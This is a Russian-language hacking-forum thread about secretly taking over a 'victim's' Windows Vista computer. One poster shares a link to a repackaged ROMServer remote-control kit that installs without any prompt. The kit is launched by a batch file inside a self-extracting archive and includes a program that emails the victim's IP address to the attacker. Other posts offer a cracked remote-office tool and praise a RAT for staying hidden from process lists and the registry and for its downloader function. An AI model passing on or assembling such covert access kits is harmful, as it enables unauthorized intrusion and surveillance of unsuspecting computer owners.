Вобщем нужно получить доступ к компу, скорее всего без внешнего ипа... на компе жертвы голая виста... хозяин ламер но не дурак поэтому надо чтоб вылезало минимум окошек.... пробовал сборку радмина но неконектит... Есть еще чтото похожешш с бакконектом или как например в AnyplaceControl (по учетке) ... ????
Должна раб. и на висте, кроме того передаёт директ3д окна тоже в отличие от Радмина (3DMAX), бэкконект вроде есть, кряка нет у меня...
RON надо настраивать на той стороне.. пасс прописывать.. как я скажу человеку, ты тут у сябе настрой его а я к те подконекчусь и сопру пассы =) тут ктото выклажывал сборку радмина которая в один клик ставиться и соодинение настраиваеться.. тита такого чтото надо...
Удаленное управление Вот собрал ROMServer, ставитсья без потвержддения и вопросов) В архиве: AledensoftIpcServer.dll English.lg ROMFUSClient.exe ROMwln.dll ROMServer.exe HookDrv.dll AledensoftSoundLib.dll -- файлы сервера sit.reg -- sfbk реестра для работы сервера Sendip.txt -- самое интересное) исходник проги которая через определеное время отправляет ip жертвы на наше мыло(нужно если ip динамический) 1.bat -- запускат все наше хозяйство.... В исходнике поправте логин и пасс от почты и адрес получателя.... Все файлы добавте в SFX архив, чтоб после распаковки запустился 1.bat, ну не мне вас учить )) http://depositfiles.com/files/xfv6lxg5d пароль 123456
Кстати врадмине есть аналогичное описание, только для него. Пошаговое, на русском. Под свистой работает радмин третей версии.
Remote Office Manager v3.3, таблетка в комплекте. http://rapidshare.com/files/175765474/rom3.3ru.rar.html Так.. может пригодится кому
Blacksun Remote Administrative Tool – довольно интересный продукт Cytech, который по-моему не обновлялся с 2007 года, но функционал которого зачастую превосходит монстрообразный Radmin. Основные характеристики: 1) невидимость в процессах и в реестре; 2) размер не более 20 Кб; 3) функции даунлоадера; 4) работа с cmd.exe; 5) управление через гейт и наличие специализированных команд. Система распространяется с исходными кодами, что, несомненно, является огромным плюсом.
раскажи для ламеров как запустится текстовый файлик и как он будет самостоятельно функционировать? тоесть он разово отправит айпишку или постоянно будет слать? ну и надо ли его перезапускать после ребута системы и тд.